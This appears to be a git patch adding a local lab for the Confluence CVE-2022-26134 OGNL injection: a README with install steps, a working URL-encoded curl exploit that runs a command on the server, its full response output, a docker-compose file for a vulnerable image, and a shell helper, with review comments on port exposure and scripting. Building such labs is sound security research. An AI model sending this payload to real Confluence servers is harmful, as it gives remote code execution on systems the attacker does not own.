From 18fa01a6f6e6f378619f6b7ec18b13b45c85ae46 Mon Sep 17 00:00:00 2001
From: "zma4580@gmail.com"
Date: Fri, 3 Jun 2022 18:13:04 -0400
Subject: [PATCH] Add docker-compose file, README and getshell.sh command

Add installation steps for confluence server
---
.../confluence-cve-2022-26134/README.md | 74 +++++++++++++++++++
.../docker-compose.yml | 16 ++++
.../confluence-cve-2022-26134/getshell.sh | 2 +
3 files changed, 92 insertions(+)
create mode 100644 proof-of-concept-exploits/confluence-cve-2022-26134/README.md
create mode 100644 proof-of-concept-exploits/confluence-cve-2022-26134/docker-compose.yml
create mode 100755 proof-of-concept-exploits/confluence-cve-2022-26134/getshell.sh

diff --git a/proof-of-concept-exploits/confluence-cve-2022-26134/README.md b/proof-of-concept-exploits/confluence-cve-2022-26134/README.md
new file mode 100644
index 0000000..5f937eb
--- /dev/null
+++ b/proof-of-concept-exploits/confluence-cve-2022-26134/README.md
@@ -0,0 +1,74 @@
+# Confluence CVE-2022-26134 OGNL vulnerability
+
+This vulnerability affects Confluence Server and Confluence Data Center. It allows an attacker to send a specially crafted HTTP request to abuse OGNL within Confluence, leading to remote code execution.
+
+In order for this vulnerability to be exploitable, the following conditions must be met:
+* Use versions of Confluence lower than 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1
+* Confluence is configured (can't use a server that hasn't been installed and not connected to a DB)
+
+
+## Running the application
+
+Run it:
+
+```
+docker-compose up
+```
+
+Install confluence
+
+1. Navigate to `localhost:8090`
+2. Get a trial license (this won't work without one)
+3. In db setup step, put in hostname: `db`, port: `5432`, dbname: `conf`, username: `postgres`, password: `koko`
+4. It'll take a while to configure, make sure you have 3-4gb of RAM
+5. Use a test site/template, and use confluence to manage users. Fill in default for admin
+6. Once you get past the admin creation step, you can run the exploit
+
+## Exploitation steps
+
+```
+curl -v http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/
+```
+
+Output:
+
+```
+└> curl -v http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/
+* Trying ::1...
+* TCP_NODELAY set
+* Connected to localhost (::1) port 8090 (#0)
+> GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/pwned%22%29%7D/ HTTP/1.1
+> Host: localhost:8090
+> User-Agent: curl/7.64.1
+> Accept: */*
+>
+< HTTP/1.1 302
+< Cache-Control: no-store
+< Expires: Thu, 01 Jan 1970 00:00:00 GMT
+< X-Confluence-Request-Time: 1654294225669
+< Set-Cookie: JSESSIONID=A12C784ACFF928E9155587F78E9EC0C0; Path=/; HttpOnly
+< X-XSS-Protection: 1; mode=block
+< X-Content-Type-Options: nosniff
+< X-Frame-Options: SAMEORIGIN
+< Content-Security-Policy: frame-ancestors 'self'
+< Location: /login.action?os_destination=%2F%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch+%2Ftmp%2Fpwned%22%29%7D%2Findex.action&permissionViolation=true
+< Content-Type: text/html;charset=UTF-8
+< Content-Length: 0
+< Date: Fri, 03 Jun 2022 22:10:25 GMT
+<
+* Connection #0 to host localhost left intact
+* Closing connection 0
+```
+
+Exec into the container
+
+```
+└> ./getshell.sh confluence
+
+root@b2db3bfbe364:/var/atlassian/application-data/confluence# ls -lah /tmp
+total 12K
+drwxrwxrwt 1 root root 4.0K Jun 3 22:12 .
+drwxr-xr-x 1 root root 4.0K Jun 3 19:56 ..
+drwxr-xr-x 2 confluence confluence 4.0K Jun 3 22:07 hsperfdata_confluence
+-rw-r----- 1 confluence confluence 0 Jun 3 22:10 pwned
+```
diff --git a/proof-of-concept-exploits/confluence-cve-2022-26134/docker-compose.yml b/proof-of-concept-exploits/confluence-cve-2022-26134/docker-compose.yml
new file mode 100644
index 0000000..9dd75cd
--- /dev/null
+++ b/proof-of-concept-exploits/confluence-cve-2022-26134/docker-compose.yml
@@ -0,0 +1,16 @@
+version: "3.9"
+services:
+ conf:
+ image: atlassian/confluence-server@sha256:83a19d7c474b550b4ab4ef383e93e16c02457d680a982debcaf32b3b7db5bf52
+ depends_on:
+ - db
+ ports:
+ - 8090:8090
+ - 8091:8091
+ # port = 5432, username = postgres
+ db:
+ image: postgres
+ restart: always
+ environment:
+ POSTGRES_PASSWORD: koko
+ POSTGRES_DB: conf
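Review bot: The `ports:` entries `- 8090:8090` and `- 8091:8091` publish the intentionally vulnerable Confluence on every host interface, so for as long as the lab is up any machine that can reach the host has the pre-auth RCE the README demonstrates. Bind them to loopback instead: `- 127.0.0.1:8090:8090` and `- 127.0.0.1:8091:8091`. The `db` service also uses the bare `image: postgres` while `conf` is pinned by digest, so a future major-version pull could break the install steps the README documents; pin it to a tag or digest the same way. Since `db` declares no volume, the Confluence setup that the README says takes a while is lost on `docker-compose down`; a named volume mounted at `/var/lib/postgresql/data` would keep it.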
diff --git a/proof-of-concept-exploits/confluence-cve-2022-26134/getshell.sh b/proof-of-concept-exploits/confluence-cve-2022-26134/getshell.sh
new file mode 100755
index 0000000..1dee70a
--- /dev/null
+++ b/proof-of-concept-exploits/confluence-cve-2022-26134/getshell.sh
@@ -0,0 +1,2 @@
+#!/bin/bash
+docker exec -t -i `docker ps | grep "$1" | cut -d " " -f 1` bash
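Review bot: The container lookup `docker ps | grep "$1" | cut -d " " -f 1` on the last line matches the argument against every column of `docker ps` output, so a second container whose image, name or status also contains it — plausibly the `db` container here, since compose names both containers after the `confluence-cve-2022-26134` directory — yields two IDs and `docker exec` then treats the second one as the command; an empty `$1` matches the `CONTAINER ID` header line as well. Let Docker do the filtering and quote the result, `docker exec -ti "$(docker ps -q --filter "name=$1")" bash`, or drop the lookup entirely with `docker-compose exec conf bash`. A missing-argument check such as `[ -n "$1" ] || { echo "usage: $0 <container>" >&2; exit 1; }` would make the failure visible instead of landing the user in whichever container is listed first, and `$(...)` is preferable to the backticks.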